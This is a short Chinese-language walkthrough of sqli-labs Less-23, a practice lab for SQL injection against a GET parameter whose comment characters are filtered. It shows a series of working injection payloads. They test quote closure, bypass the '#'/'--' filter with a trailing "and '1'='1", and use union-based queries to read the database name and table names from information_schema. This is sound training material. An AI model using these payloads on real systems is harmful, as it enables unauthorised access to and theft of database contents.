基于get的过滤了的注入

0X1测试闭合

127.0.0.1/sql1/Less-23/?id=1'

 

sqli-labs(23)_sql

http://127.0.0.1/sql1/Less-23/?id=1%27%27

sqli-labs(23)_sql_02

 0X02 然后就是组合拳的操作了

sqli-labs(23)_sql_03未报错

那么应该是’闭合 那么我们可以尝试用# 闭合 这里要url编码一次 so 我们用%23

?id=1' order by 1%23

 

sqli-labs(23)_sql_04

但是为什么还报错

我们来看看源代码 原来这里用正则表达式过滤了 # --这两种闭合 第二种我还没有试过...哈哈

sqli-labs(23)_sql_05

 

 那我们只能用单引号闭合喽 因为单引号里面的不会被执行 所以我们用and 闭合

构造语句

?id=1' and '1'='1

 

sqli-labs(23)_sql_06

正确

?id=-1' union select 1,database(),3 and '1'='1

sqli-labs(23)_sql_07

0X01爆表名

a 爆列名

?id=-1' order by 100 and '1'='1

sqli-labs(23)_sql_08

 

?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 and '1'='1

sqli-labs(23)_sql_09